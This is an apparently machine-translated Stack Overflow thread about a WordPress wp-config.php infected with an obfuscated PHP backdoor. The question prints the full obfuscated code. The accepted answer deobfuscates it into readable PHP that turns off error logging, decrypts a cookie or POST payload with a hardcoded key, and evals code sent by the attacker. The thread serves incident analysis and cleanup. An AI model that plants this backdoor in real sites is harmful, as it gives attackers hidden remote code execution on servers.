deobfuscation — WordPress взломан, понимая запутанную строку в wp-config.Stack Overflow

Question

deobfuscation — WordPress взломан, понимая запутанную строку в wp-config.Stack Overflow

WordPress моего друга wp-config.php был добавлен с одной строкой кода:

$ge142efa['cfea']="\x6d\x57\x36\x5f\x6b\x64\x2f\x49\x42\x7e\x4b\x45\x72\x6c\x28\x2e\x7a\x3a\x2a\x39\x37\x61\x67\x22\x73\x31\x38\x9\x48\x23\x70\x34\x7c\x30\x26\x43\x2b\x27\x78\x3d\x75\x68\x5a\x54\x4c\x51\x79\xd\x5b\x4e\x33\x50\xa\x44\x55\x32\x4a\x20\x3c\x25\x65\x69\x46\x60\x59\x4f\x21\x56\x71\x74\x53\x24\x5e\x40\x47\x2c\x6e\x5d\x5c\x3b\x4d\x58\x76\x3f\x35\x29\x7b\x7d\x52\x63\x6f\x77\x66\x6a\x62\x3e\x41\x2d";$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][92].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][94]]=$ge142efa['cfea'][89].$ge142efa['cfea'][41].$ge142efa['cfea'][12];$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][26]]=$ge142efa['cfea'][90].$ge142efa['cfea'][12].$ge142efa['cfea'][5];$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]=$ge142efa['cfea'][24].$ge142efa['cfea'][69].$ge142efa['cfea'][12].$ge142efa['cfea'][13].$ge142efa['cfea'][60].$ge142efa['cfea'][76];$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]=$ge142efa['cfea'][61].$ge142efa['cfea'][76].$ge142efa['cfea'][61].$ge142efa['cfea'][3].$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][69];$ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]=$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][61].$ge142efa['cfea'][21].$ge142efa['cfea'][13].$ge142efa['cfea'][61].$ge142efa['cfea'][16].$ge142efa['cfea'][60];$ge142efa[$ge142efa['cfea'][16].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][50].$ge142efa['cfea'][89]]=$ge142efa['cfea'][30].$ge142efa['cfea'][41].$ge142efa['cfea'][30].$ge142efa['cfea'][82].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][24].$ge142efa['cfea'][61].$ge142efa['cfea'][90].$ge142efa['cfea'][76];$ge142efa[$ge142efa['cfea'][61].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][26].$ge142efa['cfea'][50].$ge142efa['cfea'][33].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]=$ge142efa['cfea'][40].$ge142efa['cfea'][76].$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][61].$ge142efa['cfea'][21].$ge142efa['cfea'][13].$ge142efa['cfea'][61].$ge142efa['cfea'][16].$ge142efa['cfea'][60];$ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][92].$ge142efa['cfea'][26].$ge142efa['cfea'][20].$ge142efa['cfea'][50].$ge142efa['cfea'][2]]=$ge142efa['cfea'][94].$ge142efa['cfea'][21].$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][2].$ge142efa['cfea'][31].$ge142efa['cfea'][3].$ge142efa['cfea'][5].$ge142efa['cfea'][60].$ge142efa['cfea'][89].$ge142efa['cfea'][90].$ge142efa['cfea'][5].$ge142efa['cfea'][60];$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][89].$ge142efa['cfea'][33].$ge142efa['cfea'][84]]=$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][69].$ge142efa['cfea'][3].$ge142efa['cfea'][69].$ge142efa['cfea'][61].$ge142efa['cfea'][0].$ge142efa['cfea'][60].$ge142efa['cfea'][3].$ge142efa['cfea'][13].$ge142efa['cfea'][61].$ge142efa['cfea'][0].$ge142efa['cfea'][61].$ge142efa['cfea'][69];$ge142efa[$ge142efa['cfea'][40].$ge142efa['cfea'][31].$ge142efa['cfea'][19].$ge142efa['cfea'][25]]=$ge142efa['cfea'][61].$ge142efa['cfea'][31].$ge142efa['cfea'][2].$ge142efa['cfea'][25];$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][55].$ge142efa['cfea'][55].$ge142efa['cfea'][19].$ge142efa['cfea'][26].$ge142efa['cfea'][2].$ge142efa['cfea'][26].$ge142efa['cfea'][55]]=$ge142efa['cfea'][22].$ge142efa['cfea'][55].$ge142efa['cfea'][94].$ge142efa['cfea'][89];$ge142efa[$ge142efa['cfea'][12].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][94].$ge142efa['cfea'][92]]=$_POST;$ge142efa[$ge142efa['cfea'][93].$ge142efa['cfea'][19].$ge142efa['cfea'][20].$ge142efa['cfea'][84]]=$_COOKIE;@$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]($ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][12].$ge142efa['cfea'][90].$ge142efa['cfea'][12].$ge142efa['cfea'][3].$ge142efa['cfea'][13].$ge142efa['cfea'][90].$ge142efa['cfea'][22],NULL);@$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]($ge142efa['cfea'][13].$ge142efa['cfea'][90].$ge142efa['cfea'][22].$ge142efa['cfea'][3].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][12].$ge142efa['cfea'][90].$ge142efa['cfea'][12].$ge142efa['cfea'][24],0);@$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]($ge142efa['cfea'][0].$ge142efa['cfea'][21].$ge142efa['cfea'][38].$ge142efa['cfea'][3].$ge142efa['cfea'][60].$ge142efa['cfea'][38].$ge142efa['cfea'][60].$ge142efa['cfea'][89].$ge142efa['cfea'][40].$ge142efa['cfea'][69].$ge142efa['cfea'][61].$ge142efa['cfea'][90].$ge142efa['cfea'][76].$ge142efa['cfea'][3].$ge142efa['cfea'][69].$ge142efa['cfea'][61].$ge142efa['cfea'][0].$ge142efa['cfea'][60],0);@$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][89].$ge142efa['cfea'][33].$ge142efa['cfea'][84]](0);$tf027f=NULL;$w38258dd=NULL;$ge142efa[$ge142efa['cfea'][0].$ge142efa['cfea'][33].$ge142efa['cfea'][33].$ge142efa['cfea'][25].$ge142efa['cfea'][89].$ge142efa['cfea'][26].$ge142efa['cfea'][31].$ge142efa['cfea'][20].$ge142efa['cfea'][84]]=$ge142efa['cfea'][33].$ge142efa['cfea'][31].$ge142efa['cfea'][20].$ge142efa['cfea'][92].$ge142efa['cfea'][94].$ge142efa['cfea'][84].$ge142efa['cfea'][31].$ge142efa['cfea'][94].$ge142efa['cfea'][97].$ge142efa['cfea'][26].$ge142efa['cfea'][19].$ge142efa['cfea'][89].$ge142efa['cfea'][20].$ge142efa['cfea'][97].$ge142efa['cfea'][31].$ge142efa['cfea'][33].$ge142efa['cfea'][94].$ge142efa['cfea'][31].$ge142efa['cfea'][97].$ge142efa['cfea'][26].$ge142efa['cfea'][26].$ge142efa['cfea'][25].$ge142efa['cfea'][55].$ge142efa['cfea'][97].$ge142efa['cfea'][84].$ge142efa['cfea'][20].$ge142efa['cfea'][92].$ge142efa['cfea'][21].$ge142efa['cfea'][26].$ge142efa['cfea'][94].$ge142efa['cfea'][55].$ge142efa['cfea'][2].$ge142efa['cfea'][25].$ge142efa['cfea'][5].$ge142efa['cfea'][33].$ge142efa['cfea'][20];global$m001c8475;function g2bc($tf027f,$p7ec){global$ge142efa;$de211af="";for($z225cd560=0;$z225cd560<$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]($tf027f);){for($a7a4f09df=0;$a7a4f09df<$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]($p7ec)&&$z225cd560<$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]($tf027f);$a7a4f09df++,$z225cd560++){$de211af.=$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][92].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][94]]($ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][26]]($tf027f[$z225cd560])^$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][26]]($p7ec[$a7a4f09df]));}}return$de211af;}function i461($tf027f,$p7ec){global$ge142efa;global$m001c8475;return$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][55].$ge142efa['cfea'][55].$ge142efa['cfea'][19].$ge142efa['cfea'][26].$ge142efa['cfea'][2].$ge142efa['cfea'][26].$ge142efa['cfea'][55]]($ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][55].$ge142efa['cfea'][55].$ge142efa['cfea'][19].$ge142efa['cfea'][26].$ge142efa['cfea'][2].$ge142efa['cfea'][26].$ge142efa['cfea'][55]]($tf027f,$m001c8475),$p7ec);}foreach($ge142efa[$ge142efa['cfea'][93].$ge142efa['cfea'][19].$ge142efa['cfea'][20].$ge142efa['cfea'][84]]as$p7ec=>$i61171){$tf027f=$i61171;$w38258dd=$p7ec;}if(!$tf027f){foreach($ge142efa[$ge142efa['cfea'][12].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][94].$ge142efa['cfea'][92]]as$p7ec=>$i61171){$tf027f=$i61171;$w38258dd=$p7ec;}}$tf027f=@$ge142efa[$ge142efa['cfea'][61].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][26].$ge142efa['cfea'][50].$ge142efa['cfea'][33].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]($ge142efa[$ge142efa['cfea'][40].$ge142efa['cfea'][31].$ge142efa['cfea'][19].$ge142efa['cfea'][25]]($ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][92].$ge142efa['cfea'][26].$ge142efa['cfea'][20].$ge142efa['cfea'][50].$ge142efa['cfea'][2]]($tf027f),$w38258dd));if(isset($tf027f[$ge142efa['cfea'][21].$ge142efa['cfea'][4]])&&$m001c8475==$tf027f[$ge142efa['cfea'][21].$ge142efa['cfea'][4]]){if($tf027f[$ge142efa['cfea'][21]]==$ge142efa['cfea'][61]){$z225cd560=Array($ge142efa['cfea'][30].$ge142efa['cfea'][82]=>@$ge142efa[$ge142efa['cfea'][16].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][50].$ge142efa['cfea'][89]](),$ge142efa['cfea'][24].$ge142efa['cfea'][82]=>$ge142efa['cfea'][25].$ge142efa['cfea'][15].$ge142efa['cfea'][33].$ge142efa['cfea'][97].$ge142efa['cfea'][25],);echo@$ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]($z225cd560);}elseif($tf027f[$ge142efa['cfea'][21]]==$ge142efa['cfea'][60]){eval($tf027f[$ge142efa['cfea'][5]]);}exit();}

Что это значит?
Я пытался изменить Eval для печати, но ничего не показано.

https://eval.in/584427

1

deobfuscation php

Решение

Другие решения

Я просто имею дело с той же проблемой. Твой друг должен внести некоторые изменения. Может быть, IP-адрес отслеживается каким-то человеком & он вносит некоторые изменения в базу данных, и это также влияет на ваш интерфейс и код.

 - If you have backup of database then change the database.
- Install some security Plugin like All In One WP Security & Firewall.
(Because if IP is traced again than it may help in future).

Некоторые другие изменения.

Путь поиска изображений в базе данных может содержать вредоносные программы.
Удалить неиспользуемый скрипт из кода.
Изменить учетную запись администратора.
Изменить учетную запись Cpanel.

1

Источник

Accepted Answer

Используя var_dump после первого заявления с $_COOKIE Я мог видеть, что структура первого массива, кажется, содержит несколько имен функций, которые предположительно вызываются позже:

var_dump($ge142efa);

array(14) {
["cfea"]=>
[N3Pring(98) "mW6_kd/IB~KErl(.z:*97ag"s18   H#p4|0&C+'x=uhZTLQy
DU2J <%eiF`YO!VqtS$^@G,n]\;MXv?5){}Rcowfjb>A-"["hfa2b"]=>
string(3) "chr"["he58"]=>
string(3) "ord"["ge19947"]=>
string(6) "strlen"["xa2a5ede"]=>
string(7) "ini_set"["k5051"]=>
string(9) "serialize"["z2503c"]=>
string(10) "phpversion"["i50830251"]=>
string(11) "unserialize"["kf8736"]=>
string(13) "base64_decode"["vc05"]=>
string(14) "set_time_limit"["u491"]=>
string(4) "i461"["v2298682"]=>
string(4) "g2bc"["re5bf"]=>
string(6) "$_POST"["j975"]=>
string(8) "$_COOKIE"}

Я заменил $_POST а также $_COOKIE содержимое со строками в качестве заполнителей, потому что моя тестовая среда php -f внутри контейнера.

Часть между этим массивом и первым объявлением функции сводится к следующему:

@ini_set('error_log', NULL); // @$ge142efa['xa2a5ede']('error_log', NULL);
@ini_set('log_errors', 0); // @$ge142efa['xa2a5ede']('log_errors', 0);
@ini_set('max_execution_time', 0); // @$ge142efa['xa2a5ede']('max_execution_time', 0);
@set_time_limit(0); // @$ge142efa['vc05'](0);
$tf027f = NULL;
$w38258dd = NULL;
$ge142efa['m001c8475'] = '047fb54b-89c7-40b4-8812-57fa8b261d07';

Первая функция гласит:

function g2bc($tf027f, $p7ec){
global $ge142efa;
$de211af = "";
for($i = 0; $i < "strlen"($tf027f);){
for($j = 0; $j < "strlen"($p7ec) && $i < "strlen"($tf027f); $j++, $i++){
$de211af .= "chr"("ord"($tf027f[$i])^"ord"($p7ec[$j]));
}
}
return $de211af;
}

Похоже, что xor две строки и вернуть результат.
Функция ниже этого, i461, использует его дважды:

function i461($tf027f, $p7ec){
global $ge142efa;
global $m001c8475;
return "g2bc"("g2bc"($tf027f,$m001c8475),$p7ec);
}

Код ниже этих двух функций
можно украсить этим:

foreach($_COOKIE as $p7ec => $i61171){
$tf027f = $i61171;
$w38258dd = $p7ec;
}
if(!$tf027f){
foreach($_POST as $p7ec => $i61171){
$tf027f = $i61171;
$w38258dd = $p7ec;
}
}
$tf027f =@ "unserialize"("i461"("base64_decode"($tf027f),$w38258dd));
if(isset($tf027f["ak"]) && $m001c8475 == $tf027f["ak"]){
if($tf027f["a"] == "i"){
$z225cd560 = Array("pv" => @"phpversion"(), "sv" => "1.0-1",);
echo@"serialize"($z225cd560);
}elseif($tf027f["a"] == "e"){
eval($tf027f["d"]);
}
exit();
}

Важнейшей частью здесь является eval, С моей точки зрения это выглядит как код, который выполняет что-то, заданное правильной комбинацией $_COOKIE и / или $_POST, В основном это часть кода, ожидающая получения правильного запроса и выполнения указанного им кода.

2